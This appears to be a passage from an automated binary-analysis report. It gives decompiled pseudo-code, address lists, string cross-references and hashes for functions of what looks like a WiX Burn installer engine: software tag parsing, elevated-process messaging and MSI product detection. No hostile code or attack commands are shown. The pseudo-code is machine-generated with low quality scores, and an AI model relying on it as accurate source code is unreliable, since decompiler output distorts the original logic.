                                                                                                                                                                  0x00406208
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406203
                                                                                                                                                                  0x004061e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004061e5
                                                                                                                                                                  0x004061bb
                                                                                                                                                                  0x004061c3
                                                                                                                                                                  0x004061c6
                                                                                                                                                                  0x004061c7
                                                                                                                                                                  0x004061d0
                                                                                                                                                                  0x004061d0
                                                                                                                                                                  0x004061d3
                                                                                                                                                                  0x004061d8
                                                                                                                                                                  0x004061d8
                                                                                                                                                                  0x004061df
                                                                                                                                                                  0x004061df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004061df
                                                                                                                                                                  0x004061ca
                                                                                                                                                                  0x004061cb
                                                                                                                                                                  0x004061ec
                                                                                                                                                                  0x004061f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004061f0
                                                                                                                                                                  0x004061ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004061ce
                                                                                                                                                                  0x00406155
                                                                                                                                                                  0x00406160
                                                                                                                                                                  0x00406165
                                                                                                                                                                  0x00406179
                                                                                                                                                                  0x00406181
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406183
                                                                                                                                                                  0x0040618e
                                                                                                                                                                  0x00406193
                                                                                                                                                                  0x004061a7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004061a7
                                                                                                                                                                  0x0040612d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040612d
                                                                                                                                                                  0x004060d9
                                                                                                                                                                  0x004060da
                                                                                                                                                                  0x0040610b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040610b
                                                                                                                                                                  0x004060dc
                                                                                                                                                                  0x004060dd
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406104
                                                                                                                                                                  0x004060e0
                                                                                                                                                                  0x004060fd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004060fd
                                                                                                                                                                  0x004060e5
                                                                                                                                                                  0x004060f0
                                                                                                                                                                  0x004060f5
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00406122
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: AssignmentType$Failed to change value type.$Failed to format product code string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                  • API String ID: 3613110473-2610262219
                                                                                                                                                                  • Opcode ID: 28ff0a39875e1cf56f6802625d888a053829eff8d0f8db6509be837485e1d935
                                                                                                                                                                  • Instruction ID: 7e1105bb82afcedc9d2fc4efbb4a08c05eac82c6eb39f8478959e40c8426e773
                                                                                                                                                                  • Opcode Fuzzy Hash: 28ff0a39875e1cf56f6802625d888a053829eff8d0f8db6509be837485e1d935
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A514631941119B7DF10AA91CC43FAF7A68AB18704F12017BF902BE2C2D67C8E6196AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409CAE, Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 162COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E00409CAE(signed int _a4, intOrPtr* _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v20;
				intOrPtr* _t42;
				signed int _t46;
				signed int _t64;
				intOrPtr _t66;
				signed int _t70;
				void* _t71;
				signed int _t73;
				signed int _t74;
				intOrPtr* _t75;
				intOrPtr* _t79;
				signed int _t81;
				signed int _t84;

				_t70 = 0;
				_v20 = 0;
				_v8 = 0;
				_v16 = 0;
				_t81 = 0;
				_v12 = 0;
				if(E00435FBE(_a4, L"SoftwareTag",  &_v20) >= 0) {
					_t42 = _v20;
					_t80 =  &_v16;
					_push( &_v16);
					_push(_t42);
					if( *((intOrPtr*)( *_t42 + 0x20))() >= 0) {
						_t73 = _v16;
						if(_t73 == 0) {
							L20:
							_t84 = _t70;
							 *_a12 = _t73;
							 *_a8 = _t81;
							_t81 = _t70;
						} else {
							_t81 = E00431078(_t73 * 0xc, 1);
							if(_t81 != 0) {
								_t73 = _v16;
								_a4 = 0;
								if(_t73 == 0) {
									goto L20;
								} else {
									_t13 = _t81 + 8; // 0x8
									_t71 = _t13;
									while(1) {
										_t84 = E00435F1D(_t73, _v20,  &_v8, 0);
										if(_t84 < 0) {
											break;
										}
										_t16 = _t71 - 8; // 0x0
										_t84 = E00435B5E(_v8, L"Filename", _t16);
										if(_t84 < 0) {
											_push("Failed to get @Filename.");
											goto L31;
										} else {
											_t18 = _t71 - 4; // 0x4
											_t84 = E00435B5E(_v8, L"Regid", _t18);
											if(_t84 < 0) {
												_push("Failed to get @Regid.");
												goto L31;
											} else {
												_t84 = E00435D59(_v8,  &_v12);
												if(_t84 < 0) {
													_push("Failed to get SoftwareTag text.");
													goto L31;
												} else {
													_t84 = E00434262(_t80, _t71, _v12, 0, 0xfde9);
													if(_t84 < 0) {
														_push("Failed to convert SoftwareTag text to UTF-8");
														goto L31;
													} else {
														_t64 = _v12;
														if(_t64 != 0) {
															__imp__#6(_t64);
															_v12 = _v12 & 0x00000000;
														}
														_t79 = _v8;
														if(_t79 != 0) {
															 *((intOrPtr*)( *_t79 + 8))(_t79);
															_v8 = _v8 & 0x00000000;
														}
														_t73 = _v16;
														_t66 = _a4 + 1;
														_t71 = _t71 + 0xc;
														_a4 = _t66;
														if(_t66 < _t73) {
															continue;
														} else {
															_t70 = 0;
															goto L20;
														}
													}
												}
											}
										}
										goto L21;
									}
									_push("Failed to get next node.");
									goto L31;
								}
							} else {
								_t84 = 0x8007000e;
								E004300D9(_t53, "registration.cpp", 0x3ee, 0x8007000e);
								_push("Failed to allocate memory for software tag structs.");
								goto L31;
							}
						}
					} else {
						_push("Failed to get software tag count.");
						goto L31;
					}
				} else {
					_push("Failed to select software tag nodes.");
					L31:
					_push(_t84);
					E00430A57();
				}
				L21:
				_t46 = _v12;
				if(_t46 != 0) {
					__imp__#6(_t46);
				}
				_t74 = _v8;
				if(_t74 != 0) {
					 *((intOrPtr*)( *_t74 + 8))(_t74);
				}
				_t75 = _v20;
				if(_t75 != 0) {
					 *((intOrPtr*)( *_t75 + 8))(_t75);
				}
				if(_t81 != 0) {
					E00431137(_t81);
				}
				return _t84;
			}



















                                                                                                                                                                  0x00409cbb
                                                                                                                                                                  0x00409cc5
                                                                                                                                                                  0x00409cc8
                                                                                                                                                                  0x00409ccb
                                                                                                                                                                  0x00409cce
                                                                                                                                                                  0x00409cd0
                                                                                                                                                                  0x00409cdc
                                                                                                                                                                  0x00409ce8
                                                                                                                                                                  0x00409ceb
                                                                                                                                                                  0x00409cf0
                                                                                                                                                                  0x00409cf1
                                                                                                                                                                  0x00409cf9
                                                                                                                                                                  0x00409d05
                                                                                                                                                                  0x00409d0a
                                                                                                                                                                  0x00409e09
                                                                                                                                                                  0x00409e0c
                                                                                                                                                                  0x00409e0e
                                                                                                                                                                  0x00409e13
                                                                                                                                                                  0x00409e15
                                                                                                                                                                  0x00409d10
                                                                                                                                                                  0x00409d1b
                                                                                                                                                                  0x00409d1f
                                                                                                                                                                  0x00409d40
                                                                                                                                                                  0x00409d43
                                                                                                                                                                  0x00409d48
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d4e
                                                                                                                                                                  0x00409d4e
                                                                                                                                                                  0x00409d4e
                                                                                                                                                                  0x00409d51
                                                                                                                                                                  0x00409d5f
                                                                                                                                                                  0x00409d63
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d69
                                                                                                                                                                  0x00409d7a
                                                                                                                                                                  0x00409d7e
                                                                                                                                                                  0x00409e6f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d84
                                                                                                                                                                  0x00409d84
                                                                                                                                                                  0x00409d95
                                                                                                                                                                  0x00409d99
                                                                                                                                                                  0x00409e68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d9f
                                                                                                                                                                  0x00409dab
                                                                                                                                                                  0x00409daf
                                                                                                                                                                  0x00409e61
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409db5
                                                                                                                                                                  0x00409dc5
                                                                                                                                                                  0x00409dc9
                                                                                                                                                                  0x00409e52
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409dcf
                                                                                                                                                                  0x00409dcf
                                                                                                                                                                  0x00409dd4
                                                                                                                                                                  0x00409dd7
                                                                                                                                                                  0x00409ddd
                                                                                                                                                                  0x00409ddd
                                                                                                                                                                  0x00409de1
                                                                                                                                                                  0x00409de6
                                                                                                                                                                  0x00409deb
                                                                                                                                                                  0x00409dee
                                                                                                                                                                  0x00409dee
                                                                                                                                                                  0x00409df5
                                                                                                                                                                  0x00409df8
                                                                                                                                                                  0x00409df9
                                                                                                                                                                  0x00409dfc
                                                                                                                                                                  0x00409e01
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409e07
                                                                                                                                                                  0x00409e07
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409e07
                                                                                                                                                                  0x00409e01
                                                                                                                                                                  0x00409dc9
                                                                                                                                                                  0x00409daf
                                                                                                                                                                  0x00409d99
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d7e
                                                                                                                                                                  0x00409e76
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409e76
                                                                                                                                                                  0x00409d21
                                                                                                                                                                  0x00409d21
                                                                                                                                                                  0x00409d31
                                                                                                                                                                  0x00409d36
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409d36
                                                                                                                                                                  0x00409d1f
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409cfb
                                                                                                                                                                  0x00409cde
                                                                                                                                                                  0x00409cde
                                                                                                                                                                  0x00409e57
                                                                                                                                                                  0x00409e57
                                                                                                                                                                  0x00409e58
                                                                                                                                                                  0x00409e5e
                                                                                                                                                                  0x00409e17
                                                                                                                                                                  0x00409e17
                                                                                                                                                                  0x00409e1c
                                                                                                                                                                  0x00409e1f
                                                                                                                                                                  0x00409e1f
                                                                                                                                                                  0x00409e25
                                                                                                                                                                  0x00409e2a
                                                                                                                                                                  0x00409e2f
                                                                                                                                                                  0x00409e2f
                                                                                                                                                                  0x00409e32
                                                                                                                                                                  0x00409e37
                                                                                                                                                                  0x00409e3c
                                                                                                                                                                  0x00409e3c
                                                                                                                                                                  0x00409e41
                                                                                                                                                                  0x00409e44
                                                                                                                                                                  0x00409e44
                                                                                                                                                                  0x00409e4f

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00409E1F
                                                                                                                                                                  Strings
                                                                                                                                                                  • SoftwareTag, xrefs: 00409CBD
                                                                                                                                                                  • Regid, xrefs: 00409D88
                                                                                                                                                                  • Filename, xrefs: 00409D6D
                                                                                                                                                                  • Failed to get @Regid., xrefs: 00409E68
                                                                                                                                                                  • Failed to select software tag nodes., xrefs: 00409CDE
                                                                                                                                                                  • Failed to allocate memory for software tag structs., xrefs: 00409D36
                                                                                                                                                                  • registration.cpp, xrefs: 00409D2C
                                                                                                                                                                  • Failed to get software tag count., xrefs: 00409CFB
                                                                                                                                                                  • Failed to get next node., xrefs: 00409E76
                                                                                                                                                                  • Failed to convert SoftwareTag text to UTF-8, xrefs: 00409E52
                                                                                                                                                                  • Failed to get SoftwareTag text., xrefs: 00409E61
                                                                                                                                                                  • Failed to get @Filename., xrefs: 00409E6F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Regid$SoftwareTag$registration.cpp
                                                                                                                                                                  • API String ID: 3341692771-11506941
                                                                                                                                                                  • Opcode ID: 6d3b088df9f1be80e335f7dbac88f733bf2e047fe34f1e0c54c853198254b40d
                                                                                                                                                                  • Instruction ID: 9d87db156f2721f044cc9d79e436c17b50a36ec2c7ba1e493363bfb2afc7aaca
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d3b088df9f1be80e335f7dbac88f733bf2e047fe34f1e0c54c853198254b40d
                                                                                                                                                                  • Instruction Fuzzy Hash: F2519E31A41315ABDB15EFA5C885FAEB7B8AF04B14F10416BF915BB2C2C739DD108B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004014BB, Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 147synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E004014BB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed short _t35;
				long _t36;
				signed short _t37;
				signed short _t60;
				signed short _t63;
				intOrPtr _t75;
				signed short _t79;
				signed short _t83;
				signed short _t86;

				_t73 = __edx;
				_t71 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_push(_t69);
				_t75 = _a12;
				if( *((intOrPtr*)(_t75 + 0x460)) != 2) {
					L5:
					_t35 = E0040EF74(_t69, _t71, _t75 + 0x46c, 1);
					__eflags = _t35;
					if(_t35 >= 0) {
						_t36 = TlsAlloc();
						 *(_t75 + 0x464) = _t36;
						__eflags = _t36 - 0xffffffff;
						if(_t36 != 0xffffffff) {
							_t37 = TlsSetValue(_t36,  *(_t75 + 0x47c));
							__eflags = _t37;
							if(_t37 != 0) {
								_t79 = E0041787A(_a4, _t75);
								__eflags = _t79;
								if(_t79 >= 0) {
									E004331E2(_t71, _t73, 1);
									E00430EA1(E00401124, _t75);
									_t79 = E00416312( *(_t75 + 0x464),  *(_t75 + 0x47c),  *((intOrPtr*)(_t75 + 0x480)), _t75 + 0x290, _t75 + 0x2a8, _t75 + 0x2a0, _t75 + 0x88, _t75 + 0xf8, _t75 + 0xb8,  &_v8,  &_v12, _t75 + 0xf4, _t75 + 0x18);
									E00430EA1(0, 0);
									__eflags = _t79;
									if(_t79 < 0) {
										_push("Failed to pump messages from parent process.");
										goto L15;
									}
								} else {
									_push("Failed to create the message window.");
									goto L15;
								}
							} else {
								_t60 = GetLastError();
								__eflags = _t60;
								_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
								__eflags = _t83;
								_t79 =  >=  ? 0x80004005 : _t83;
								E004300D9(0x80004005, "engine.cpp", 0x1c7, _t79);
								_push("Failed to set elevated pipe into thread local storage for logging.");
								goto L15;
							}
						} else {
							_t63 = GetLastError();
							__eflags = _t63;
							_t86 =  <=  ? _t63 : _t63 & 0x0000ffff | 0x80070000;
							__eflags = _t86;
							_t79 =  >=  ? 0x80004005 : _t86;
							E004300D9(0x80004005, "engine.cpp", 0x1c2, _t79);
							_push("Failed to allocate thread local storage for logging.");
							goto L15;
						}
					} else {
						_push("Failed to connect to unelevated process.");
						goto L15;
					}
				} else {
					_t79 = E0040F1D5(_t75 + 0x470, __edx, _t75 + 0x46c, _t75 + 0x470);
					if(_t79 >= 0) {
						_push( *((intOrPtr*)(_t75 + 0x4a0)));
						_t79 = E0040F5E1(_a8,  *((intOrPtr*)(_t75 + 0x2c)),  *((intOrPtr*)(_t75 + 0x46c)),  *_t69);
						__eflags = _t79;
						if(_t79 >= 0) {
							goto L5;
						} else {
							_push("Failed to launch unelevated process.");
							goto L15;
						}
					} else {
						_push("Failed to create implicit elevated connection name and secret.");
						L15:
						E00430A57();
						_t71 = _t79;
					}
				}
				E00430EA1(0, 0);
				E0041783B(_t75);
				_t89 = _v12;
				if(_v12 != 0) {
					E00416439(_t71, _t89);
				}
				if(_v8 != 0) {
					ReleaseMutex(_v8);
					CloseHandle(_v8);
				}
				return _t79;
			}















                                                                                                                                                                  0x004014bb
                                                                                                                                                                  0x004014bb
                                                                                                                                                                  0x004014be
                                                                                                                                                                  0x004014bf
                                                                                                                                                                  0x004014c0
                                                                                                                                                                  0x004014c4
                                                                                                                                                                  0x004014c8
                                                                                                                                                                  0x004014cb
                                                                                                                                                                  0x004014d5
                                                                                                                                                                  0x00401523
                                                                                                                                                                  0x0040152c
                                                                                                                                                                  0x00401533
                                                                                                                                                                  0x00401535
                                                                                                                                                                  0x00401541
                                                                                                                                                                  0x00401547
                                                                                                                                                                  0x0040154d
                                                                                                                                                                  0x00401550
                                                                                                                                                                  0x00401591
                                                                                                                                                                  0x00401597
                                                                                                                                                                  0x00401599
                                                                                                                                                                  0x004015dc
                                                                                                                                                                  0x004015de
                                                                                                                                                                  0x004015e0
                                                                                                                                                                  0x004015eb
                                                                                                                                                                  0x004015f6
                                                                                                                                                                  0x00401653
                                                                                                                                                                  0x00401655
                                                                                                                                                                  0x0040165a
                                                                                                                                                                  0x0040165c
                                                                                                                                                                  0x0040165e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040165e
                                                                                                                                                                  0x004015e2
                                                                                                                                                                  0x004015e2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004015e2
                                                                                                                                                                  0x0040159b
                                                                                                                                                                  0x0040159b
                                                                                                                                                                  0x004015aa
                                                                                                                                                                  0x004015ac
                                                                                                                                                                  0x004015b4
                                                                                                                                                                  0x004015b6
                                                                                                                                                                  0x004015c4
                                                                                                                                                                  0x004015c9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004015c9
                                                                                                                                                                  0x00401552
                                                                                                                                                                  0x00401552
                                                                                                                                                                  0x00401561
                                                                                                                                                                  0x00401563
                                                                                                                                                                  0x0040156b
                                                                                                                                                                  0x0040156d
                                                                                                                                                                  0x0040157b
                                                                                                                                                                  0x00401580
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401580
                                                                                                                                                                  0x00401537
                                                                                                                                                                  0x00401537
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401537
                                                                                                                                                                  0x004014d7
                                                                                                                                                                  0x004014ea
                                                                                                                                                                  0x004014ee
                                                                                                                                                                  0x004014fa
                                                                                                                                                                  0x00401513
                                                                                                                                                                  0x00401515
                                                                                                                                                                  0x00401517
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401519
                                                                                                                                                                  0x00401519
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401519
                                                                                                                                                                  0x004014f0
                                                                                                                                                                  0x004014f0
                                                                                                                                                                  0x00401663
                                                                                                                                                                  0x00401664
                                                                                                                                                                  0x0040166a
                                                                                                                                                                  0x0040166a
                                                                                                                                                                  0x004014ee
                                                                                                                                                                  0x0040166f
                                                                                                                                                                  0x00401675
                                                                                                                                                                  0x0040167a
                                                                                                                                                                  0x0040167e
                                                                                                                                                                  0x00401680
                                                                                                                                                                  0x00401680
                                                                                                                                                                  0x00401689
                                                                                                                                                                  0x0040168e
                                                                                                                                                                  0x00401697
                                                                                                                                                                  0x00401697
                                                                                                                                                                  0x004016a3

                                                                                                                                                                  APIs
                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040168E
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00401E79,?,?,?), ref: 00401697
                                                                                                                                                                    • Part of subcall function 0040F1D5: UuidCreate.RPCRT4(?), ref: 0040F208
                                                                                                                                                                    • Part of subcall function 0040F1D5: StringFromGUID2.OLE32(?,0041652F,00000027), ref: 0040F225
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create implicit elevated connection name and secret., xrefs: 004014F0
                                                                                                                                                                  • Failed to connect to unelevated process., xrefs: 00401537
                                                                                                                                                                  • Failed to create the message window., xrefs: 004015E2
                                                                                                                                                                  • Failed to allocate thread local storage for logging., xrefs: 00401580
                                                                                                                                                                  • Failed to launch unelevated process., xrefs: 00401519
                                                                                                                                                                  • Failed to pump messages from parent process., xrefs: 0040165E
                                                                                                                                                                  • Failed to set elevated pipe into thread local storage for logging., xrefs: 004015C9
                                                                                                                                                                  • engine.cpp, xrefs: 00401576, 004015BF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFromHandleMutexReleaseStringUuid
                                                                                                                                                                  • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create implicit elevated connection name and secret.$Failed to create the message window.$Failed to launch unelevated process.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$engine.cpp
                                                                                                                                                                  • API String ID: 3991521885-93479633
                                                                                                                                                                  • Opcode ID: 34f1cff577931829e6629deb5f9281991acc35fdc8f0db52f71a0ad386d89483
                                                                                                                                                                  • Instruction ID: 258432ed297cc1ebc3285347751d2ea4d79cc0bd7a0ecbc5016af88003a47749
                                                                                                                                                                  • Opcode Fuzzy Hash: 34f1cff577931829e6629deb5f9281991acc35fdc8f0db52f71a0ad386d89483
                                                                                                                                                                  • Instruction Fuzzy Hash: AF41B472A40615BBDB159AB1CC45FEBB6A8FF08314F100327FA15F61A0DB79A9108BDD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041AD2A, Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 493COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E0041AD2A(void* __ecx, int __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				short _v88;
				char _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				char _v108;
				int _v112;
				int _v116;
				signed int _v120;
				int _v124;
				intOrPtr _v128;
				char _v132;
				int _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t145;
				void* _t151;
				int _t159;
				signed int _t160;
				int _t161;
				intOrPtr* _t162;
				int _t168;
				int _t169;
				intOrPtr* _t175;
				int _t178;
				int _t180;
				void* _t185;
				intOrPtr _t194;
				intOrPtr* _t201;
				void* _t208;
				int _t214;
				intOrPtr* _t215;
				int _t218;
				int _t220;
				intOrPtr* _t221;
				intOrPtr _t222;
				int _t223;
				intOrPtr* _t229;
				intOrPtr* _t232;
				void* _t234;
				int _t237;
				int _t241;
				intOrPtr _t243;
				void* _t245;
				int _t247;
				intOrPtr _t249;
				int _t250;
				int _t254;
				int _t256;
				void* _t257;
				void* _t258;
				intOrPtr* _t261;
				int _t262;
				int _t263;
				intOrPtr* _t265;
				signed int _t266;
				void* _t267;
				void* _t268;

				_t252 = __edx;
				_t145 =  *0x4560d0; // 0xae480e18
				_v8 = _t145 ^ _t266;
				_v120 = _v120 | 0xffffffff;
				_t232 = _a4;
				_t256 = 0;
				_push(0x4e);
				_v104 = _a8;
				_push(0);
				_push( &_v88);
				_v92 = 0;
				_v108 = 0;
				_v96 = 0;
				E004267C0(_t232, __ecx, 0, _t257, __eflags);
				_t268 = _t267 + 0xc;
				_push( &_v92);
				_push(L"VersionString");
				_t151 = 2;
				_t234 = 4;
				_t152 =  !=  ? _t234 : _t151;
				_push( !=  ? _t234 : _t151);
				_push(0);
				_push( *(_t232 + 0x90));
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x80], xmm0");
				_v124 = 0;
				_t258 = E00435361(_t234);
				if(_t258 < 0) {
					__eflags = _t258 - 0x80070645;
					if(_t258 == 0x80070645) {
						L19:
						 *(_t232 + 0x40) = 2;
						_t259 = _t256;
						L20:
						_v116 = _t256;
						__eflags =  *((intOrPtr*)(_t232 + 0xc0)) - _t256;
						if( *((intOrPtr*)(_t232 + 0xc0)) <= _t256) {
							L76:
							__eflags =  *(_t232 + 0xb8);
							if( *(_t232 + 0xb8) == 0) {
								L106:
								if(_v108 != 0) {
									E004380AB(_v108);
								}
								if(_v92 != 0) {
									E004380AB(_v92);
								}
								return L004267AF(_t259, _v8 ^ _t266, _t256, _t259);
							}
							_t159 = _t256;
							_v116 = _t256;
							do {
								_t254 =  *((intOrPtr*)(_t232 + 0xb4)) + _t159;
								_t237 = 4;
								_v112 = _t254;
								__eflags =  *(_t232 + 0x40) - _t237;
								if( *(_t232 + 0x40) < _t237) {
									_t160 = 2;
									_v120 = _t160;
									L83:
									_t161 = _t160 - 1;
									__eflags = _t161;
									if(_t161 == 0) {
										 *(_t254 + 0x1c) = 2;
										L99:
										_t162 =  *((intOrPtr*)(_v104 + 0x10));
										_t259 = E00408843(_v104, 1,  *((intOrPtr*)( *_t162 + 0x38))(_t162,  *_t232,  *_t254,  *(_t254 + 0x1c)));
										__eflags = _t259;
										if(_t259 < 0) {
											E004300D9(_t164, "msiengine.cpp", 0x26c, _t259);
											_push("UX aborted detect.");
											L105:
											_push(_t259);
											E00430A57();
											goto L106;
										}
										goto L100;
									}
									_t168 = _t161 - 1;
									__eflags = _t168;
									if(_t168 == 0) {
										 *(_t254 + 0x1c) = 1;
										goto L99;
									}
									_t169 = _t168 - 1;
									__eflags = _t169;
									if(_t169 == 0) {
										 *(_t254 + 0x1c) = 3;
										goto L99;
									}
									_t170 = _t169 != 1;
									__eflags = _t169 != 1;
									if(_t169 != 1) {
										_t259 = 0x8000ffff;
										E004300D9(_t170, "msiengine.cpp", 0x266, 0x8000ffff);
										_push("Invalid state value.");
										goto L105;
									}
									 *(_t254 + 0x1c) = _t237;
									goto L99;
								}
								_t259 = E0043572E( *(_t232 + 0x90),  *_t254,  &_v120);
								__eflags = _t259;
								if(_t259 < 0) {
									_push("Failed to query feature state.");
									goto L105;
								}
								_t160 = _v120;
								_t254 = _v112;
								__eflags = _t160 - 0xffffffff;
								if(_t160 == 0xffffffff) {
									_t160 = 2;
									_v120 = _t160;
								}
								_t237 = 4;
								goto L83;
								L100:
								_t256 = _t256 + 1;
								_t159 = _v116 + 0x28;
								_v116 = _t159;
								__eflags = _t256 -  *(_t232 + 0xb8);
							} while (_t256 <  *(_t232 + 0xb8));
							goto L106;
						}
						_t241 = _t256;
						_v112 = _t256;
						do {
							_t175 =  *((intOrPtr*)(_t232 + 0xbc)) + _t241;
							_t242 =  &_v88;
							_push( &_v88);
							_push(_t256);
							_push( *_t175);
							_v100 = _t175;
							_v136 = _t256;
							while(1) {
								_t259 = E004350FF();
								__eflags = _t259 - 0x80070103;
								if(_t259 == 0x80070103) {
									goto L75;
								}
								__eflags = _t259;
								if(_t259 < 0) {
									_push("Failed to enum related products.");
									goto L105;
								}
								_t178 = CompareStringW(_t256, 1,  *(_t232 + 0x90), 0xffffffff,  &_v88, 0xffffffff);
								__eflags = _t178 - 2;
								if(_t178 == 2) {
									L72:
									_t261 = _v100;
									L73:
									_t242 =  &_v88;
